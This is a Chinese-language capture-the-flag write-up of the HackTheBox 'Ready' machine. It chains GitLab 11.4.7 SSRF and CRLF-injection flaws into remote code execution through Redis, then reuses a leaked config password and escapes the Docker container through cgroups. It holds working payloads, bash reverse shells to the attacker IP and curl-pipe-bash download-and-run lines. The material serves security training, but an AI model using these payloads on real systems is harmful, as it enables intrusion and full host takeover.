Ready-htb-writeup

0x00 靶场技能介绍

章节技能：CVE-2018-19585、CVE-2018-19571、exp脚本修改排错、配置文件密码泄露、容器提权

参考链接：https://0xdf.gitlab.io/2021/05/15/htb-ready.html

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.220

2、扫描下开放端口情况：

┌──(kali㉿kali)-[~/桌面/tools/portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.220 tcp
[sudo] kali 的密码：
开始对 10.10.10.220 进行nmap端口扫描...
* 正在执行tcp协议的端口扫描探测...
sudo nmap -min-rate 10000 -p- "10.10.10.220" -oG "10.10.10.220"-tcp-braker-allports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 20:16 CST
Warning: 10.10.10.220 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.220
Host is up (0.34s latency).
Not shown: 33504 closed tcp ports (reset), 32029 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
5080/tcp open  onscreen

Nmap done: 1 IP address (1 host up) scanned in 66.27 seconds
* 正在对开放的端口进行TCP全连接式版本探测和系统版本以及漏洞探测...
sudo nmap -sT -sV -sC -p"22,5080," "10.10.10.220"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 20:18 CST
Nmap scan report for 10.10.10.220
Host is up (0.34s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.80 seconds

3、通过查看5080端口上的服务页面，发现这个是Gitlab的一个服务页面

http://10.10.10.220:5080/robots.txt

http://10.10.10.220:5080/dashboard/projects

http://10.10.10.220:5080/users/sign_in

4、这里我先注册一个账号信息

shiyan

shiyan@qq.com

1234567890

5、登录到后台后，发现了该系统的版本信息

GitLab Community Edition 11.4.7

6、根据搜索版本号，成功的获取到漏洞利用的信息

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit GitLab 11.4.7
------------------------------------------------------- ---------------------------------
 Exploit Title                                         |  Path
------------------------------------------------------- ---------------------------------
GitLab 11.4.7 - RCE (Authenticated) (2)                | ruby/webapps/49334.py
GitLab 11.4.7 - Remote Code Execution (Authenticated)  | ruby/webapps/49257.py
------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m ruby/webapps/49334.py
  Exploit: GitLab 11.4.7 - RCE (Authenticated) (2)
      URL: https://www.exploit-db.com/exploits/49334
     Path: /usr/share/exploitdb/exploits/ruby/webapps/49334.py
    Codes: CVE-2018-19585, CVE-2018-19571
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (359)
Copied to: /home/kali/桌面/49334.py

┌──(kali㉿kali)-[~/桌面]
└─$ python3 49334.py         
usage: 49334.py [-h] -u U -p P -g G -l L -P P
49334.py: error: the following arguments are required: -u, -p, -g, -l, -P

┌──(kali㉿kali)-[~/桌面]
└─$ python3 49334.py -u shiyan -p 1234567890 -g http://10.10.10.220 -l 10.10.14.8 -P 443
[+] authenticity_token: wTPcvdOYa5Ga0zcJ55JCeAEjYEBrCf0I225Pc2PP1afTJsy1rDygqr0hzu0ZTQQzxLoKrIV5/HEZbh2u3iyIhA==
[+] Creating project with random name: project240
[+] Running Exploit
[+] Exploit completed successfully!

7、但是这里我并没有接收到反弹过来的shell。。。。

8、这里给人的感觉来说，应该就是这2个漏洞的组合，那没办法，只能手动的操作进行获取反弹shell了

CVE-2018-19571 SSRF

SSRF 漏洞是攻击者可以欺骗服务器代表他们发出请求的地方。本例中，漏洞位于新建项目->导入项目页面：

当我选择“Repo by URL”时，我有机会输入 URL，服务器将向该 URL 发出 GET 请求。我将打开nc端口 80 并将其http://10.10.4.8作为 URL。该网站显示正在进行的导入只是挂起。在我的虚拟机上，收到一个请求：

Git repository url

http://10.10.14.8

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 80 
listening on [any] 80 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.220] 34996
GET /info/refs?service=git-upload-pack HTTP/1.1
Host: 10.10.14.8
User-Agent: git/2.18.1
Accept: */*
Accept-Encoding: deflate, gzip
Pragma: no-cache

9、到这里，可以明确的是，漏洞是没错的，那继续下一个漏洞

CVE-2018-19585 - CRLF 注入

POST /projects HTTP/1.1
Host: 10.10.10.220:5080
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://10.10.10.220:5080/projects/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 363
Origin: http://10.10.10.220:5080
Connection: close
Cookie: _gitlab_session=19ede108b18daaf98eb2bd6a7ca4e9cc; event_filter=all
Upgrade-Insecure-Requests: 1

utf8=%E2%9C%93&authenticity_token=EUpiOE0fNqkr%2FqYMU7Z3UMyOwG8uxdhGl7%2BVYAFwug%2FafEyAAyRAeXyCCgvlnK%2FHUYfzC6yQi7Ew1hpm7Mq2Zw%3D%3D&project%5Bimport_url%5D=git%3A%2F%2F10.10.14.8%3A80%2Ftest
test1
test2
test3
%2F.git&project%5Bci_cd_only%5D=false&project%5Bname%5D=test3&project%5Bnamespace_id%5D=6&project%5Bpath%5D=test&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.220] 35610
0049git-upload-pack /test 
test1 
test2 
test3 
/.githost=10.10.14.8:80

10、这里确实是收到换行的内容了,这个漏洞也是没问题的，那就开始组合起来利用吧

参考地址：https://hackerone.com/reports/299473

┌──(kali㉿kali)-[~/桌面]
└─$ cat shell.sh         
#!/bin/bash

bash >& /dev/tcp/10.10.14.8/443 0>&1

创建并导入

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/.git

POST /projects HTTP/1.1
Host: 10.10.10.220:5080
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://10.10.10.220:5080/projects/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 394
Origin: http://10.10.10.220:5080
Connection: close
Cookie: _gitlab_session=19ede108b18daaf98eb2bd6a7ca4e9cc; event_filter=all
Upgrade-Insecure-Requests: 1

utf8=%E2%9C%93&authenticity_token=VnJtV23ET0R57h8AGNw0nzeoY3mpjUYBsKFQ877zsDidREPvI%2F85lC6Ssweu9uwIqqFQHSvYFfYXyN%2F1U0m8UA%3D%3D&project%5Bimport_url%5D=git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest
 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|curl http://10.10.14.8/shell.sh|bash\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
%2F.git&project%5Bci_cd_only%5D=false&project%5Bname%5D=test8&project%5Bnamespace_id%5D=6&project%5Bpath%5D=test8&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.220 - - [16/Jan/2024 11:00:44] "GET /shell.sh HTTP/1.1" 200 -
10.10.10.220 - - [16/Jan/2024 11:01:03] "GET /shell.sh HTTP/1.1" 200 -
10.10.10.220 - - [16/Jan/2024 11:01:36] "GET /shell.sh HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.220] 48898
id
uid=998(git) gid=998(git) groups=998(git)
python3 -c 'import pty;pty.spawn("/bin/bash")'
git@gitlab:~/gitlab-rails/working$ 

git@gitlab:~/gitlab-rails/working$ id
id
uid=998(git) gid=998(git) groups=998(git)
git@gitlab:~/gitlab-rails/working$ 

11、那就获取下第一个flag信息吧

git@gitlab:~/gitlab-rails/working$ ls -la /home
ls -la /home
total 12
drwxr-xr-x 1 root root 4096 Apr  5  2022 .
drwxr-xr-x 1 root root 4096 Apr  5  2022 ..
drwxr-xr-x 2 root root 4096 Apr  5  2022 dude
git@gitlab:~/gitlab-rails/working$ ls -la /home/dude
ls -la /home/dude
total 12
drwxr-xr-x 2 root root 4096 Apr  5  2022 .
drwxr-xr-x 1 root root 4096 Apr  5  2022 ..
-r-xr-x--x 2 git  git    33 Jan 16 01:51 user.txt
git@gitlab:~/gitlab-rails/working$ cat /home/dude/user.txt
cat /home/dude/user.txt
9db1020b9d3cc27229c646622b524844
git@gitlab:~/gitlab-rails/working$ 

12、这里其实反过来推这个exp为啥没执行成功，原来是估计程序里不知道直接nc 形式的反弹，下面修改了获取反弹shell的命令，最后成功获取到shell。

form = """\nmulti
    sadd resque:gitlab:queues system_hook_push
    lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'curl http://{local_ip}:{local_port}/shell.sh | bash' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
    exec
    exec
    exec\n"""

0x02 系统权限获取

13、gitlab-secrets.json有与 GitLab 相关的密钥和东西，但对我来说没有任何用处。docker-compose.yml很有趣，以后会有用。gitlab.rb是一个配置文件，其中绝大多数行以注释#. 我将用来grep删除这些行，然后选择非空白行。只有一个：

git@gitlab:~/gitlab-rails/working$ ls -la                                                
ls -la                                                                                   
total 8                                                                                  
drwx------ 2 git root 4096 Apr  5  2022 .                                                
drwxr-xr-x 9 git root 4096 Jan 16 01:51 ..                                               
git@gitlab:~/gitlab-rails/working$ ipconfig
ipconfig
bash: ipconfig: command not found
git@gitlab:~/gitlab-rails/working$ cd /opt
cd /opt
git@gitlab:/opt$ ls -la
ls -la
total 24
drwxr-xr-x 1 root root 4096 Apr  5  2022 .
drwxr-xr-x 1 root root 4096 Apr  5  2022 ..
drwxr-xr-x 2 root root 4096 Apr  5  2022 backup
drwxr-xr-x 1 root root 4096 Apr  5  2022 gitlab
git@gitlab:/opt$ cd backup
cd backup
git@gitlab:/opt/backup$ ls -la
ls -la
total 112
drwxr-xr-x 2 root root  4096 Apr  5  2022 .
drwxr-xr-x 1 root root  4096 Apr  5  2022 ..
-rw-r--r-- 1 root root   904 Apr  5  2022 docker-compose.yml
-rw-r--r-- 1 root root 15150 Apr  5  2022 gitlab-secrets.json
-rw-r--r-- 1 root root 81492 Apr  5  2022 gitlab.rb
git@gitlab:/opt/backup$ cat gitlab.rb | grep -v "^#" | grep .
cat gitlab.rb | grep -v "^#" | grep .

gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"

git@gitlab:/opt/backup$ 

14、到这里就获取到了容器里的密码了，切换下

git@gitlab:/opt/backup$ su -  
su -
Password: wW59U!ZKMbG9+*#h

root@gitlab:~# 

root@gitlab:~# 

15、接下来的操作，就触及知识盲区了，主要参考了下面的文章

https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.8/poc.sh | bash' >/c;
chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";

16、远程利用下，来读取下最终的flag信息吧

┌──(kali㉿kali)-[~/桌面]
└─$ cat poc.sh  
#!/bin/bash

bash >& /dev/tcp/10.10.14.8/10086 0>&1

root@gitlab:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@gitlab:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@gitlab:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.8/poc.sh | bash' >/c;
<d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.8/poc.sh | bash' >/c;      
root@gitlab:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";
chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";
root@gitlab:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@gitlab:~# 

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.220] 54088
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/
cd /root/
ls -la
total 68
drwx------ 10 root root 4096 Jan 16 01:51 .
drwxr-xr-x 20 root root 4096 Apr  5  2022 ..
lrwxrwxrwx  1 root root    9 Jul 11  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  2 root root 4096 Apr  5  2022 .cache
drwx------  3 root root 4096 Apr  5  2022 .config
-rw-r--r--  1 root root   44 Jul  8  2020 .gitconfig
-rw-------  1 root root   32 Apr  5  2022 .lesshst
drwxr-xr-x  3 root root 4096 Apr  5  2022 .local
lrwxrwxrwx  1 root root    9 Dec  7  2020 .mysql_history -> /dev/null
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   75 Jul 12  2020 .selected_editor
drwx------  2 root root 4096 Apr  5  2022 .ssh
drwxr-xr-x  2 root root 4096 Apr  5  2022 .vim
-rw-rw-rw-  1 root root 1432 Apr  5  2022 .viminfo
drwxr-xr-x  3 root root 4096 Apr  5  2022 docker-gitlab
drwxr-xr-x 10 root root 4096 Apr  5  2022 ready-channel
-r--------  1 root root   33 Jan 16 01:51 root.txt
drwxr-xr-x  3 root root 4096 Apr  5  2022 snap
cat root.txt
b1bc77140df76ab7840a4e68b25a0edd

17、涉及到容器的技能，还是有些难啊 = =！

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/304